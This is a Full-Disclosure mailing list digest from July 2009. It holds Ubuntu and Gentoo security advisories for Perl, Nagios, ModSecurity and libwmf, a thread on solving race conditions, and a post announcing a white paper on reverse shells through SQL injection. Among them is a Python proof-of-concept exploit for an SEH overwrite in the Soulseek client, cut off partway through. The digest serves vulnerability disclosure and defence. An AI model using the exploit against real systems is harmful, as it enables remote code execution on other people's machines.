de4a4ef7075e0bad4f62c3adf5f4acc4 http://security.ubuntu.com/ubuntu/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.015-1ubuntu0.1.dsc Size/MD5: 1671 6147cba4955a7f9b311e536eb361ce8f http://security.ubuntu.com/ubuntu/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.015.orig.tar.gz Size/MD5: 209006 6680d7ee3fbfd5171ccf239328c284fd http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.10.0-19ubuntu1.1.diff.gz Size/MD5: 142376 4fd80dae4bcdc95123d60cee3e29c1d2 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.10.0-19ubuntu1.1.dsc Size/MD5: 1427 6b03788301ebf60ea0689751afc50ea2 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.10.0.orig.tar.gz Size/MD5: 15595020 d2c39b002ebfd2c3c5dba589365c5a71 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.10.0-19ubuntu1.1_all.deb Size/MD5: 8189298 18586966152940aec8e962566593327f http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.10.0-19ubuntu1.1_all.deb Size/MD5: 3182408 6043c0947e8447fb3c25b9bae875f720 http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.10.0-19ubuntu1.1_all.deb Size/MD5: 45104 8037f52f976e9cc3bc76297f9b04872d amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.015-1ubuntu0.1_amd64.deb Size/MD5: 58776 73df5f8e78ab911025decd8bf22e8ad4 http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.10.0-19ubuntu1.1_amd64.deb Size/MD5: 2609412 7db9491dc9a33752921a267fe57d9529 http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.10_5.10.0-19ubuntu1.1_amd64.deb Size/MD5: 1062 e245edb342cb27301c499279d5aa2ef4 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.10.0-19ubuntu1.1_amd64.deb Size/MD5: 1041470 22e876c2f8d290c6b4b0c16f7f66848a http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.10.0-19ubuntu1.1_amd64.deb Size/MD5: 5580404 be790fb42dab1dd27483876497e21e3e http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.10.0-19ubuntu1.1_amd64.deb Size/MD5: 31186 646b75a18c69327f7a3521484f592ab4 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.10.0-19ubuntu1.1_amd64.deb Size/MD5: 5224556 f9481d202c8d5e3bdbad21b581782759 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.015-1ubuntu0.1_i386.deb Size/MD5: 57140 d61a6cd30f5e2f154dd8d38af0e45d25 http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.10.0-19ubuntu1.1_i386.deb Size/MD5: 2371632 6bb172e1efcbc379a3eb5893aea9b8e3 http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.10_5.10.0-19ubuntu1.1_i386.deb Size/MD5: 627732 6a069a9d64ee32eb9b0fbb529a09869d http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.10.0-19ubuntu1.1_i386.deb Size/MD5: 968826 d12c4729feee32e26a4a96830d30771a http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.10.0-19ubuntu1.1_i386.deb Size/MD5: 6723346 03e4e70ba33fc3362b30c776c2ed4149 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.10.0-19ubuntu1.1_i386.deb Size/MD5: 29416 e3494414bf5fb27346cef69a6be836f0 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.10.0-19ubuntu1.1_i386.deb Size/MD5: 4541240 15f50b6a54a0cb3956fd45a4a36dd3af lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.015-1ubuntu0.1_lpia.deb Size/MD5: 58086 9d504fc5de381d25a1d3166e7acb6795 http://ports.ubuntu.com/pool/main/p/perl/libperl-dev_5.10.0-19ubuntu1.1_lpia.deb Size/MD5: 2387018 bd56d250b8b058f474ed407c88b4e1fe http://ports.ubuntu.com/pool/main/p/perl/libperl5.10_5.10.0-19ubuntu1.1_lpia.deb Size/MD5: 1058 0bbd8f0305c8224779d33ef28fd2a3d2 http://ports.ubuntu.com/pool/main/p/perl/perl-base_5.10.0-19ubuntu1.1_lpia.deb Size/MD5: 996994 50f6dc6a9f97224a821a459f787b3fd6 http://ports.ubuntu.com/pool/main/p/perl/perl-debug_5.10.0-19ubuntu1.1_lpia.deb Size/MD5: 5638296 8bb2b5549607679ac4d31d374589325f http://ports.ubuntu.com/pool/main/p/perl/perl-suid_5.10.0-19ubuntu1.1_lpia.deb Size/MD5: 29754 1f7910ca182cdc40b11b977047e439e3 http://ports.ubuntu.com/pool/main/p/perl/perl_5.10.0-19ubuntu1.1_lpia.deb Size/MD5: 4553464 25c6d395f93ef1216dff54ef89909940 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.015-1ubuntu0.1_powerpc.deb Size/MD5: 61260 6184a1a8af2721bb6a7d2dfc9064c965 http://ports.ubuntu.com/pool/main/p/perl/libperl-dev_5.10.0-19ubuntu1.1_powerpc.deb Size/MD5: 2842344 631c5405603f6eae781440a4ac72fb7b http://ports.ubuntu.com/pool/main/p/perl/libperl5.10_5.10.0-19ubuntu1.1_powerpc.deb Size/MD5: 1070 55c5c50bf7cf70866c770c639ebcf3f2 http://ports.ubuntu.com/pool/main/p/perl/perl-base_5.10.0-19ubuntu1.1_powerpc.deb Size/MD5: 1050038 182d6ef8ad3055abeea77f5badf3d6bf http://ports.ubuntu.com/pool/main/p/perl/perl-debug_5.10.0-19ubuntu1.1_powerpc.deb Size/MD5: 5905664 0938f89a8d8871ed37549a927e5be1e1 http://ports.ubuntu.com/pool/main/p/perl/perl-suid_5.10.0-19ubuntu1.1_powerpc.deb Size/MD5: 32496 6ac9d82f0e2ad9d2c3b3aa5c4e402fdc http://ports.ubuntu.com/pool/main/p/perl/perl_5.10.0-19ubuntu1.1_powerpc.deb Size/MD5: 4942644 867653024b773a463b9105bda6173cbc sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.015-1ubuntu0.1_sparc.deb Size/MD5: 58842 eda1968d5cb891aebcd1b315ff78ab37 http://ports.ubuntu.com/pool/main/p/perl/libperl-dev_5.10.0-19ubuntu1.1_sparc.deb Size/MD5: 2408090 5b34865d40e9d8e598f99153eca41d18 http://ports.ubuntu.com/pool/main/p/perl/libperl5.10_5.10.0-19ubuntu1.1_sparc.deb Size/MD5: 1062 57c8c980c6267c743c0ec55d0cb3f843 http://ports.ubuntu.com/pool/main/p/perl/perl-base_5.10.0-19ubuntu1.1_sparc.deb Size/MD5: 985692 80873f46b596c01a627c43cbda67345c http://ports.ubuntu.com/pool/main/p/perl/perl-debug_5.10.0-19ubuntu1.1_sparc.deb Size/MD5: 5442844 a43356eb2ff70e98e7d0cfe3e21cfdca http://ports.ubuntu.com/pool/main/p/perl/perl-suid_5.10.0-19ubuntu1.1_sparc.deb Size/MD5: 30348 09eefb0b0859e7f46e5aae0288444465 http://ports.ubuntu.com/pool/main/p/perl/perl_5.10.0-19ubuntu1.1_sparc.deb Size/MD5: 4833390 3b6c920f0c8b86121222bfbdac631a24 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090702/571815dc/attachment.bin From marc.deslauriers at canonical.com Thu Jul 2 19:29:06 2009 From: marc.deslauriers at canonical.com (Marc Deslauriers) Date: Thu, 02 Jul 2009 14:29:06 -0400 Subject: [Full-disclosure] [USN-795-1] Nagios vulnerability Message-ID: <1246559346.6009.3.camel@mdlinux.technorage.com> =========================================================== Ubuntu Security Notice USN-795-1 July 02, 2009 nagios2, nagios3 vulnerability CVE-2009-2288 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: nagios2 2.11-1ubuntu1.5 Ubuntu 8.10: nagios3 3.0.2-1ubuntu1.2 Ubuntu 9.04: nagios3 3.0.6-2ubuntu1.1 After a standard system upgrade you need to restart Nagios to effect the necessary changes. Details follow: It was discovered that Nagios did not properly parse certain commands submitted using the WAP web interface. An authenticated user could exploit this flaw and execute arbitrary programs on the server. Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.5.diff.gz Size/MD5: 38279 5ac25c4aebdf965b305601c175702762 http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.5.dsc Size/MD5: 1174 550ace4cab74733c7ba58d996105fe41 http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2_2.11.orig.tar.gz Size/MD5: 1741962 058c1f4829de748b42da1b584cccc941 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2-common_2.11-1ubuntu1.5_all.deb Size/MD5: 61606 7c7cdbb7a541a7dc2e6cbe6b0a1e4a1c http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2-doc_2.11-1ubuntu1.5_all.deb Size/MD5: 1135074 434928fdccc05df77e7c1b55c0944f7d amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2-dbg_2.11-1ubuntu1.5_amd64.deb Size/MD5: 1641482 c196a73f534801375beae196a695e2a3 http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.5_amd64.deb Size/MD5: 1106466 1f9ee59209d23fec44c8caef64d73603 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2-dbg_2.11-1ubuntu1.5_i386.deb Size/MD5: 1553278 8cfc9a73ee6b53cb92ef16ceace75c81 http://security.ubuntu.com/ubuntu/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.5_i386.deb Size/MD5: 987476 fb77a60168243e0e9b2ce41fb6b6d952 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2-dbg_2.11-1ubuntu1.5_lpia.deb Size/MD5: 1587648 895c0d78b5911808b2eb41180ec14f02 http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.5_lpia.deb Size/MD5: 999380 8d58ae28c5486ca49bea608504b626f0 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2-dbg_2.11-1ubuntu1.5_powerpc.deb Size/MD5: 1610524 c7c0f2c4ba63f63501215495753ff780 http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.5_powerpc.deb Size/MD5: 1109852 db249ea38d72b5da364d0a72e980e496 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2-dbg_2.11-1ubuntu1.5_sparc.deb Size/MD5: 1449090 5a55e6d14881d445b8f61bbb34ce0b5a http://ports.ubuntu.com/pool/universe/n/nagios2/nagios2_2.11-1ubuntu1.5_sparc.deb Size/MD5: 989830 c0755ea4ad906f8a390696f5b22e70b5 Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.2.diff.gz Size/MD5: 38837 9d114719a76218b8a5091e0366cb7021 http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.2.dsc Size/MD5: 1644 dd4d8f5b405b7172784b948063b3edc6 http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.2.orig.tar.gz Size/MD5: 2759331 008d71aac08660bc007f7130ea82ab80 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-common_3.0.2-1ubuntu1.2_all.deb Size/MD5: 72322 fe1bd2d9b7b4445431c26812b1f31882 http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-doc_3.0.2-1ubuntu1.2_all.deb Size/MD5: 2063342 b1f7b496156df603ba106ce0ef5586ef amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-dbg_3.0.2-1ubuntu1.2_amd64.deb Size/MD5: 2660548 9bb9cc6116a2339f5576571d0743c836 http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.2_amd64.deb Size/MD5: 1538942 745dadf430d6d524ce2a03f4a5862a07 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-dbg_3.0.2-1ubuntu1.2_i386.deb Size/MD5: 2429640 607d3061e30c10cd6e1e35d2fd6360df http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.2_i386.deb Size/MD5: 1387634 5ceaf6ffdc011083ad34eb3d8dbfb136 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/nagios3/nagios3-dbg_3.0.2-1ubuntu1.2_lpia.deb Size/MD5: 2480154 a6da42b7b34b6cd061194b3af2220085 http://ports.ubuntu.com/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.2_lpia.deb Size/MD5: 1376700 2ea3ee9bca2ae629740dfce4487698d5 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/nagios3/nagios3-dbg_3.0.2-1ubuntu1.2_powerpc.deb Size/MD5: 2631370 5f68ac3f75cc8761b84213ea5c11adf3 http://ports.ubuntu.com/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.2_powerpc.deb Size/MD5: 1525420 917f29e0d8b82bdb86887af4806ef5f1 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/nagios3/nagios3-dbg_3.0.2-1ubuntu1.2_sparc.deb Size/MD5: 2327596 13a0e4f497814b337fde9e12c49ad043 http://ports.ubuntu.com/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.2_sparc.deb Size/MD5: 1380100 4e25adcec75a84c620a9fb7e18b75702 Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.6-2ubuntu1.1.diff.gz Size/MD5: 38327 dc34106fff458be3756e32a243493aeb http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.6-2ubuntu1.1.dsc Size/MD5: 1644 040f8f07b7412fcef4d0524940d279f2 http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.6.orig.tar.gz Size/MD5: 2735504 900e3f4164f4b2a18485420eeaefe812 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-common_3.0.6-2ubuntu1.1_all.deb Size/MD5: 75416 a033c3d7df46e468829ca115bb972a38 http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-doc_3.0.6-2ubuntu1.1_all.deb Size/MD5: 2034048 d67fb713664aaba43e5c61f73d8ccc49 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-dbg_3.0.6-2ubuntu1.1_amd64.deb Size/MD5: 2700484 75291229645109a5e7b91b6f4424258c http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.6-2ubuntu1.1_amd64.deb Size/MD5: 1545190 3c62bce19c004bc1806fb0f67571a4f1 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-dbg_3.0.6-2ubuntu1.1_i386.deb Size/MD5: 2475634 8469b5914727459b29c59499fc8e7dae http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.6-2ubuntu1.1_i386.deb Size/MD5: 1393028 9c999ffd347ee3ae7f67276877ec60fe lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/nagios3/nagios3-dbg_3.0.6-2ubuntu1.1_lpia.deb Size/MD5: 2518790 6bb2db3e55bbac932c61337bd747607c http://ports.ubuntu.com/pool/main/n/nagios3/nagios3_3.0.6-2ubuntu1.1_lpia.deb Size/MD5: 1381592 8ddf7128ad7e373dd83f5c322961660a powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/nagios3/nagios3-dbg_3.0.6-2ubuntu1.1_powerpc.deb Size/MD5: 2677292 7c7a08f106cda4312bb4ca5a78f574d9 http://ports.ubuntu.com/pool/main/n/nagios3/nagios3_3.0.6-2ubuntu1.1_powerpc.deb Size/MD5: 1531258 bb4c09f548d08b0f23b48f6de1ac1602 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/nagios3/nagios3-dbg_3.0.6-2ubuntu1.1_sparc.deb Size/MD5: 2367924 6d548fa4e1b0845eb83713fd95179811 http://ports.ubuntu.com/pool/main/n/nagios3/nagios3_3.0.6-2ubuntu1.1_sparc.deb Size/MD5: 1384926 ee9e8973823c241fe7b9d5611476b887 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090702/84bb5dfc/attachment.bin From a3li at gentoo.org Thu Jul 2 20:38:32 2009 From: a3li at gentoo.org (Alex Legler) Date: Thu, 02 Jul 2009 21:38:32 +0200 Subject: [Full-disclosure] [ GLSA 200907-02 ] ModSecurity: Denial of Service Message-ID: <1246563512.4324.2.camel@localhost> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200907-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: ModSecurity: Denial of Service Date: July 02, 2009 Bugs: #262302 ID: 200907-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Two vulnerabilities in ModSecurity might lead to a Denial of Service. Background ========== ModSecurity is a popular web application firewall for the Apache HTTP server. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-apache/mod_security < 2.5.9 >= 2.5.9 Description =========== Multiple vulnerabilities were discovered in ModSecurity: * Juan Galiana Lara of ISecAuditors discovered a NULL pointer dereference when processing multipart requests without a part header name (CVE-2009-1902). * Steve Grubb of Red Hat reported that the "PDF XSS protection" feature does not properly handle HTTP requests to a PDF file that do not use the GET method (CVE-2009-1903). Impact ====== A remote attacker might send requests containing specially crafted multipart data or send certain requests to access a PDF file, possibly resulting in a Denial of Service (crash) of the Apache HTTP daemon. NOTE: The PDF XSS protection is not enabled by default. Workaround ========== There is no known workaround at this time. Resolution ========== All ModSecurity users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-apache/mod_security-2.5.9" References ========== [ 1 ] CVE-2009-1902 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1902 [ 2 ] CVE-2009-1903 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1903 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200907-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 198 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090702/660ea0ff/attachment.bin From a3li at gentoo.org Thu Jul 2 20:36:57 2009 From: a3li at gentoo.org (Alex Legler) Date: Thu, 02 Jul 2009 21:36:57 +0200 Subject: [Full-disclosure] [ GLSA 200907-01 ] libwmf: User-assisted execution of arbitrary code Message-ID: <1246563417.4324.0.camel@localhost> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200907-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libwmf: User-assisted execution of arbitrary code Date: July 02, 2009 Bugs: #268161 ID: 200907-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== libwmf bundles an old GD version which contains a "use-after-free" vulnerability. Background ========== libwmf is a library for converting WMF files. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-libs/libwmf < 0.2.8.4-r3 >= 0.2.8.4-r3 Description =========== The embedded fork of the GD library introduced a "use-after-free" vulnerability in a modification which is specific to libwmf. Impact ====== A remote attacker could entice a user to open a specially crafted WMF file, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. Workaround ========== There is no known workaround at this time. Resolution ========== All libwmf users should upgrade to the latest version which no longer builds the GD library: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/libwmf-0.2.8.4-r3" References ========== [ 1 ] CVE-2009-1364 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1364 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200907-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 198 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090702/881c32cf/attachment.bin From laurent.gaffie at gmail.com Fri Jul 3 01:27:59 2009 From: laurent.gaffie at gmail.com (laurent gaffie) Date: Thu, 2 Jul 2009 20:27:59 -0400 Subject: [Full-disclosure] Soulseek 157 NS < 13e & 156.* Remote Direct Peer Search Code Execution Message-ID: <4b13609c0907021727o3f0afdbey85cc76803d9a10ad@mail.gmail.com> Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution ============================================= - Release date: July 02, 2009 - Discovered by: Laurent Gaffi? ; http://g-laurent.blogspot.com/ - Severity: critical ============================================= I. VULNERABILITY ------------------------- Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution II. BACKGROUND ------------------------- "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file sharing application. One of the things that makes Soulseek(tm) unique is our community and community-related features. Based on peer-to-peer technology, virtual rooms allow you to meet people with the same interests, share information, and chat freely using real-time messages in public or private. Soulseek(tm), with its built-in people matching system, is a great way to make new friends and expand your mind!" III. DESCRIPTION ------------------------- Soulseek client allows direct peer file search, allowing a user to find the files he wants directly on the peer computer. Unfortunatly this feature is vulnerable to a remote SEH overwrite. IV. PROOF OF CONCEPT ------------------------- This proof of concept will target a user called 123yow123. import struct import sys, socket from time import * ip = "IP_ADDR" port = "PORT_NUM" #You can find out, how to find out IP/PORT if you RTFM :) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip,port)) except: print "Can\'t connect to peer!\n" sys.exit(0) junk = "\x41" * 3084 next_seh = struct.pack(' References: <4A4D4FF3.8070101@linuxbox.org> Message-ID: <5e01c29a0907021801i2c38a62cxf07bb3190d825d94@mail.gmail.com> On Fri, Jul 3, 2009 at 10:25 AM, Gadi Evron wrote: > A friend recently demonstrated on his blog a simple race condition he > encountered. He also challenged folks to solve the problem. > > http://www.algorithm.co.il/blogs/index.php/programming/a-simple-race-condition/ > > There's an interesting discussion in the comments which is worth a quick > read. > > Also, maybe someone here will come up with a cuter idea? Posted my proposed solution in the comments, but will probably take a while to be moderated. Basically, you just need to check if you should still be computing, and, at the end of computation, if your data is still "wanted". > ? ? ? ?Gadi. > -- > Gadi Evron, > ge at linuxbox.org. > > Blog: http://gevron.livejournal.com/ -- noon silky http://lets.coozi.com.au/ From Valdis.Kletnieks at vt.edu Fri Jul 3 03:04:26 2009 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Thu, 02 Jul 2009 22:04:26 -0400 Subject: [Full-disclosure] [Code-Crunchers] a simple race condition and how you'd solve it In-Reply-To: Your message of "Fri, 03 Jul 2009 11:01:34 +1000." <5e01c29a0907021801i2c38a62cxf07bb3190d825d94@mail.gmail.com> References: <4A4D4FF3.8070101@linuxbox.org> <5e01c29a0907021801i2c38a62cxf07bb3190d825d94@mail.gmail.com> Message-ID: <12004.1246586666@turing-police.cc.vt.edu> On Fri, 03 Jul 2009 11:01:34 +1000, silky said: > Basically, you just need to check if you should still be computing, > and, at the end of computation, if your data is still "wanted". All that does is push the race condition around. You *still* need to do some sort of locking around the tail end. This is still racy: if (update_still_wanted) { stash_my_update(); update_still_wanted = false; } (Admittedly, not *as* racy, especially if you move the assignment first. But that's still racy enough to actually *trip* on occasion - this sort of bug is actually found at least once a month in the Linux kernel in some device driver or other...) And to be honest - the "best" way of fixing this is *really* going to depend on the relative weight of locking (which can be *very* different if you have 2 threads on 2 CPUs, or 4096 threads on a 4096-core monster, or are split across systems possibly in different countries connected by a high or maybe low speed network), and how much effort goes into the computation, and how much correctness matters - for some cases, you *really* want "first to finish" (possibly due to side effects of the computation), others "any complete answer" is good enough, etc.. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090702/4727f324/attachment.bin From pklanka at gmail.com Fri Jul 3 05:04:37 2009 From: pklanka at gmail.com (Phani) Date: Fri, 3 Jul 2009 09:34:37 +0530 Subject: [Full-disclosure] [Code-Crunchers] a simple race condition and how you'd solve it In-Reply-To: <12004.1246586666@turing-police.cc.vt.edu> References: <4A4D4FF3.8070101@linuxbox.org> <5e01c29a0907021801i2c38a62cxf07bb3190d825d94@mail.gmail.com> <12004.1246586666@turing-police.cc.vt.edu> Message-ID: I may be seriously wrong here; But how about implementing a simple bool cache as a check for cache result computation. result = cache.select(input) if result: return result resultcompute = cache.select(resultcompute) if (resultcompute == true) { while(!cache.select(resultcompute)) { } return cache.select(result) } if resultcompute = null { cache.insert(resultcompute, true) result = compute(input) cache.insert(input, result) cache.insert(resultcompute, false) } return result I think above code would work enough. I does not remove racy condition in totality though. E.g. For a condition if two threads are accessing boolean cache variable at the same time. But since boolean computation and inserting into cache is a millisecond effort, this probability of two threads coming at this point at same time is very much reduced. regards Phani On Fri, Jul 3, 2009 at 7:34 AM, wrote: > On Fri, 03 Jul 2009 11:01:34 +1000, silky said: > > > Basically, you just need to check if you should still be computing, > > and, at the end of computation, if your data is still "wanted". > > All that does is push the race condition around. You *still* need to > do some sort of locking around the tail end. This is still racy: > > if (update_still_wanted) { > stash_my_update(); > update_still_wanted = false; > } > > (Admittedly, not *as* racy, especially if you move the assignment first. > But > that's still racy enough to actually *trip* on occasion - this sort of bug > is actually found at least once a month in the Linux kernel in some device > driver or other...) > > And to be honest - the "best" way of fixing this is *really* going to > depend on > the relative weight of locking (which can be *very* different if you have 2 > threads on 2 CPUs, or 4096 threads on a 4096-core monster, or are split > across > systems possibly in different countries connected by a high or maybe low > speed > network), and how much effort goes into the computation, and how much > correctness matters - for some cases, you *really* want "first to finish" > (possibly due to side effects of the computation), others "any complete > answer" > is good enough, etc.. > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090703/a1bee4a3/attachment.html From ferruh at mavituna.com Fri Jul 3 11:50:50 2009 From: ferruh at mavituna.com (Ferruh Mavituna) Date: Fri, 3 Jul 2009 11:50:50 +0100 Subject: [Full-disclosure] One Click Ownage [White Paper and Scripts] Message-ID: <6dc88c3c0907030350l54f956d6m4b9f9c7a950b16c0@mail.gmail.com> This is a different and more practical approach to get a reverse shell or code execution in SQL Injections (particularly in MSSQL). The idea is simple. Getting a reverse shell from an SQL Injection with one HTTP request without using an extra channel such as TFTP, FTP to upload the initial payload. White paper explains the steps and the details of the attack. Scripts got all the tools you need to create your HTTP request with your own payload. White Paper: http://ferruh.mavituna.com/papers/oneclickownage.pdf Scripts: 